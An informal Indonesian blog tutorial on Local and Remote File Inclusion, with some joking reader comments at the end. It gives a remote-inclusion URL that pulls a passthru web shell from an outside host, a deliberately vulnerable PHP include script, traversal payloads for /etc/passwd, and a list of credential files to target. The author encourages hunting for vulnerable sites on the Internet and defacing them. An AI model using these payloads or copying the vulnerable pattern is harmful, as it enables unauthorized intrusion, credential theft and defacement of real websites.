Local File Inclusion Vulnerability adalah sebuah kelemahan aplikasi web yang menyebabkan seorang Attacker mdapat mengeksploitasi engine yang digunakan atau Web Server dengan mengakses direktori dan mengeksekusi command di luar root web server. Local File Inclusion Vulnerability erat kaitannya dengan Directory Traversal. Local File Inclusion Vulnerability dilakukan secara lokal dari web server tersebut, sedangkan Remote File Inclusion Vulnerability dilakukan secara remote dengan melakukan menyisipkan script php dari luar kedalam situs atau aplikasi web.
Contoh Remote File Inclusion :
http://www.victim.com/index.php?page=http://www.situsgw.com/cmd.txt&?cmd=ls -al
Injeksi seperti di atas akan memunculkan daftar direktori webserver seperti perintah ls -al di shell linux. Dimana isi file cmd.txt adalah :
<?
passthru($_GET[cmd]);
?>
Dibawah ini contoh skrip php yang vulnerable terhadap LFI (Local File Inclusion):
<?php
$page = $_GET[page];
include($page);
?>
jika script php diakses dengan metode LFI seperti ini
victim.com/index.php?page=../../../../../../../etc/passwd
akan muncul isi dari /etc/passwd
Contoh potongan kode diatas jangan sekali-kali anda gunakan, karena variabel $page tidak ter-sanitasi dengan baik dan memperbolehkan attacker untuk mengakses sebuah halaman web secara langsung. Tapi sialnya contoh script diatas sudah sangat jarang ada di internet sekarang, mungkin para pembuat web mulai pintar 
jadi anda harus bekerja keras untuk menemukan bugs ini di Internet.
Sekarang bagaimana cara eksploitasi dari bugs tersebut. Dalam sebuah web server kita tahu ada sebuah script yang vulnerable berada di http://victim.org/data/page.php lalu kita akses script tersebut maka script tersebut berjalan dengan semestinya, sekarang kita akses file sitemap.xml yang berada di root direktori seperti ini http://victim.org/data/page.php?page=sitemap.xml maka akan muncul isi dari file sitemap.xml.
Lalu bagaimana kalau kita akses sitemap.xml seperti ini http://victim.org/data/page.php?page=../sitemap.xml maka muncul isi dari file sitemap.xml sama seperti sebelumnya. penggunaan “../” disebut dengan Directory Transversal. Directory Transversal membuat kita meloncat satu direktori ke atas. Jika tempat hosting web aplikasi tersebut di webserver yang berbasis Unix atau Linux memungkin kita untuk mengintip file-file yang menarik seperti melihat file passwd seperti gambar screenshoot di sebuah webserver di internet dibawah ini ;
local file inclusion
dan beberapa file yang menarik untuk proses penetration testing :
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
local file inclusion
sebenarnya bugs ini bisa kita kembangkan untuk aksi yang lebih iseng lagi yaitu deface, dimana mengganti halaman web seseorang. cuma gak sempet nyari target yang vulnerable,, tugas kuliah gak selese-selese,,mungkin lain,,hahahaa
gaya Lw.. ngerusak bahasa Indonesia aja Lw, campur2 bhs Indonesia dgn bhs Inggris..
iyaah,,bkannya begitu bro,,klo diterjemahkan bahasa indonesia gak nyambung, dan gak mungkin dicarikan bahasa serapannya,,
kaya Cinta Laura aja Lw..
oh itu mantan pacar gue,,jadi ketularan gue,,,